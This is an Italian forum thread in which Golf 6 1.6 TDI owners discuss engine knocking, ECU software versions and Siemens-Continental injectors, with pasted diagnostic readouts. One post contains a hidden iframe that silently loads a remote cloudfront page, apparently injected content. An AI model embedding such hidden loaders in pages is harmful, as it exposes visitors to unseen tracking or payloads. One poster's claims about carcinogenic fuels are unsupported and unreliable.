annuncio

Comprimi
Ancora nessun annuncio.

AD12 Sopra discussione per loggati

Comprimi

Centralina e problemi motore - Golf 6 1.6 TDI 105 CV-

Comprimi
X

• Filtro
  • Ora
  • Visualizza
Elimina tutto
nuovi messaggi

• Re: Centralina e problemi motore - Golf 6 1.6 TDI 105 CV-

.. guardate un po' qui ?

inizio a pensare che i common rail euro 5 soffrano piu` o meno tutti di irregolarita` tipo quella del 1.6 tdi vw . o sbaglio ??
    Ciao, io sono il BOT della VW Golf Community e quando un account viene rimosso per inutilizzo io mi approprio dei suoi messaggi
    Non mandarmi email o PM perché io sono un BOT e non rispondo !

Commenta

Sarei curioso di sapere che centralina e iniettori monta la nuova focus! e non sarei soprpreso se fossero anche loro della continental siemens! Roby la tua come va? ancora tutto ok?

Commenta

Mi pare di aver letto da qualche parte che sono anche loro delle siemens-continental

Commenta

Si, risulta anche a me che siano Siemens; questo me lo ricordo perchè i primi cr Ford non potevano essere fatti da Bosh per l'esclusiva con Mb e Fiat.
          <iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6M TAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>

Commenta

Allora se fosse cosi sono propenso a pensare che non sia un problema di euro5, anche perche se fosse cosi ne dovrebbero soffrire anche i motori fiat mercedes bmw opel ecc ecc! scondo me è piu facile pensare che questo componenti non siano ancora perfettamente a punto! unito anche al fatto che le case automobilistiche ultimamente se ne fregano dei clienti! sarà la crisi? che porta a risparmaire su tutto? anche sulla cura del cliente!
            Mario hai controllato che centralina monta la tua e che SW hai?
            Hai ancora il modulo della psi o lo hai venduto? quasi quasi lo prendo che ne dici?

Commenta

Sono le siemens continental !!.. per gli iniettori non ho idea !!

Marco la mia macchina e` in letargo nel box da martedi scorso e credo ci rimarra` almeno fino a meta` sett. prox . Sto venendo in ufficio con la navetta aziendale perche` mi e` piu` comodo ( oltre che piu` economico ) e per qualche giorno sto utilizzando la Punto aziendale per cui non ho avuto modo piu` di provare la Golf .
              L'ultima volta che l`ho presa mi pare che un po' di battito l`ho sentito pero` non sobbalzava e non si e` mai spenta .
              A dire il vero sarei abbastanza motivato di prenderla per verificare come va` a seguito allineamento iniettori , magari nel fine settimana vedro` di farci un giro tempo permettendo , la sera quando torno non ne ho proprio modo .
              Comunque il mio vicino di box con questa Focus 1.6 tdci e` disperato , altro che problemi a noi noti !Se hai letto poi il forum Ford a qualcuno gli si e` inchiodata in sorpasso sull`autostrada , problemi con lo start e stop , un delirio !!
              Vi ricordate quando vi dicevo che avevo noleggiato una Peugeut 1.6 hdi che batteva come un trattore ? Non mi sbagliavo neanche in quel caso , la mia a confronto sembrava spenta !!! E` piena la rete di casi di 1.6 hdi Peugeut che con battiti ed irregolarita` , hanno le siemens continental anche loro ?

Guardate secondo me questi episodi sono piu` o meno tutti collegati all`elettronica troppo invasiva nel caso degli Euro 5 1.6 TDI . Io ci lavoro con la documentazione di apparati radio e vi assicuro che i maggiori problemi sono legati a versioni sw non corrette .
              Certo se avessi letto tutto cio` mi sarei tenuto la mia bella sw a benzina con 13 anni e 105mila km . Non frenava una ceppa ma il motore era un orologio , ma almeno non stavo in ansia che un problema ad un sensore o un aggiornamento sw errato mi possa creare forti disagi .

Per quanto riguarda striscia credo che una buona possibilita` di riuscita della segnalazione sia quella di porlo come un problema che possa fare audience , per questo forse sarebbe meglio che la segnalazione la facessi tu ( ovviamente supportato ci mancherebbe ) per quel discorso di uso che hai della vettura .
              Purtroppo questi prendono in visione solo casi che fanno ascolto secondo me .
              Le iene lasciatelo stare , non e` il programma giusto secondo me !!
              Ciao, io sono il BOT della VW Golf Community e quando un account viene rimosso per inutilizzo io mi approprio dei suoi messaggi

Commenta

Se non sbaglio la ford e di conseguenza anche la mazda i motori diesel sono proprio i pegeaut, quindi stessi problemi! per quanto riguarda striscia si infatti sono propenso a pensare che la mia la prenderebbero in considerazione proprio per quel motivo che ho scritto ma mi farebbe piacere se nella segnalazione ci fossero anche i vostri riferimenti, almeno posso provare che non sono un visionario e che il problema esiste ed è diffuso!

Commenta

Marco ti ho inviato un mp .

Saluti

Commenta

Ok roby ti ho risposto! quasi quasi apro un topic per raccogliere le adesioni per striscia!

Commenta

leggete un po` qui ??

Commenta

ragazzi i problemi sono:
                        1) gestione elettronica
                        2) centralina
                        3) stramaledetto DPF che è una fregatura come fu a suo tempo per la benzina senza piombo.
                        piccolo OT: col dpf le particelle che escono dallo scappamento sono più piccole e quindi inalate in profondita... a voi le conseguenze.
                        la vecchia benzina super rendeva di piu, costava di meno e NON ERA CANCEROGENA. l'attuale benzina senza piombo per non ricordo quale sostanza che ha in piu rispetto alla vecchia super INVECE E' CANCEROGENA...

---------- Post added at 17:19 ---------- Previous post was at 17:17 ----------

MAW Address 09: Cent. Elect. (J519) Labels: 1K0-937-08x-09.clb
                        Part No SW: 1K0 937 087 E HW: 1K0 937 087 E
                        Component: BCM PQ35 H+ 103 0575
                        Revision: 00103 AG

Commenta

Allora il gruppo PSA di cui fa parte citroen e pegeaut produce i motori per tutte e due le marche, e i stessi diesel lo fornisce a ford che li monta anche a mazda on quanto mazda e della ford, quindi stessi motori stessi problemi, a questo punto deduco che se sia questi motori psa e sia i vw montano centraline e iniettori continental siemens, vuol dire che:
                          1) il problema del ticchettio tipo battito in testa di tutti questi motori, dipende da una cattiva gestione della fase di iniezione.
                          2) è evidente che il problema è software, e quindi da qui il perchè di tutti questi tentativi di aggiornamenti centralina!
                          3)trattasi cmq di problema e non di caratteristica, in quanto un motore che ha le fasi di iniezione carfburante non perfette alla linga puo avere problemi sia ai pistoni sia alle valvole, e cmq il motore non rende come dovrebbe, da qui il maggior consumo riscontrato da tanti di noi, e le scarse prestazioni in alcuni casi!

---------- Post added at 17:36 ---------- Previous post was at 17:33 ----------

No mario la 09 è la centralina della rete di bordo, devi andare sul canale engine e poi appena ti colleghi ti da il codice della centralina sulla sinistra e sulla destra ti da il codice del sw! il codeice della centralina del motore deve cominciare con 03L

Commenta

Address 01: Engine (J623-CAYC) Labels: 03L-906-023-CAY.clb
                            Part No SW: 03L 906 023 B HW: 03L 906 023 A
                            Component: 1,6l R4 CR td H23 8831
                            Revision: --H23--- Serial number: 00000000000000
                            Coding: 00114016032400080000
                            Shop #: WSC 02205 264 99621
                            ASAM Dataset: EV_ECM16TDI02103L906023B 003007
                            ROD: EV_ECM16TDI02103L906023B.rod
                            VCID: 2579DAE824FA27B

No fault code found.
                            Readiness: 0000 0000

Commenta

Ok allora le nostre centraline hanno la lettera finale differente, per quanto riguarda il codice del sw te hai 8831 io ho 8879, mentre sul sito di quattruote a carlito gli hanno installato 88 97, quindi il tuo è piu vecchio del mio ed entrambi abbiamo versioni piu vcchie di quello di carlito su skoda, l'unico problema è sapere se il sftware cambia codice in base alla marca su cui viene montato te che ne pensi mario?

Commenta

penso che o l'una o l'altra il risultato non cambia...
                                penso che entro un mese massimo dovrò fare il tagliando e vediamo a quel punto se ci sono novità

Commenta

Pens anche io che i sw siano gli stessi per tutte le marche! cmq a carlito sembra che la macchina vada bene!

Commenta

• Sai perche la macchina di mio padre non a problemi? Per la centralina è una bosch edc 16

Commenta

Hanno risparmiato sulla qualita` delle centraline e questi sono i risultati secondo me .
                                      Variare il sw su un concetto approssimativo di base non fa` miracoli , forse puo` solo minimizzare i problemi .
                                      I componenti elettronici di qualsiasi dispositivo si suddividono in classi di utilizzo che vanno da una piu` bassa per uso civile commerciale fino a quella piu` alta per uso militare .
                                      Ci sono diverse classi che differiscono tra loro ad esempio per range di temperatura in cui garantiscono le caratteristiche .
                                      Giusto per dare un idea la classe commerciale ad esempio ha come range di funzionamento da 0 gradi a + 80 , poi c`e` la classe industriale -40 / + 100 , la classe militare va da -55 a + 125 .
                                      Oltre alle differenze di temperature ci sono anche diversita` di tolleranza sui valori , di risposta in frequenza e molto altro . Giusto per dare un idea un circuito integrato a parita` di funzione puo` costare 20 centesimi o 20 euro a seconda della categoria di appartenenza , quindi lo stesso componente come funzione ma 100 volte piu` costoso .
                                      Ora io non ho idea dove sia la centralina delle nostre auto ma se si trova vicino al motore le temperature in ballo sono sicuramente molto variabili .
                                      Al di fuori delle normali temperature di esercizio i componenti possono avere comportamenti diversi o addirittura in casi estremi smettere di funzionare .
                                      I componenti che vengono usati su apparati radio militari sono ovviamente della categoria appropriata proprio perche` non ci si puo` permettere di far smettere di trasmettere una radio su un aereo o su una nave .
                                      Poi bisogna valutare anche come e` stata progettata questa centralina , nel senso che se l`hardware e il software hanno delle lacune di tipo progettuale i problemi non li risolvi neanche sostituendo componenti militari a quelli commerciali .
                                      Bisogna tener presente poi che alcune famiglie di circuiti integrati commerciali non hanno il corrispondente item nel range militare .
                                      Che cosa c`e` dentro a queste centraline ? si possono aprire ? Dove sono collocate ?

Commenta

Dovrebbe essere messa dietro al motore lato batteria se non sbaglio, e dicono che asttulamente è difficile aprirle perche per impedire il tuning usano delle colle con le quali le sigillano che sono molto forti, e forzandole s irischia di romperle!

Commenta

• Che io sappia con un po' di pazienza e asciugacapelli si aprono...

Commenta

Sto operando...
                                          X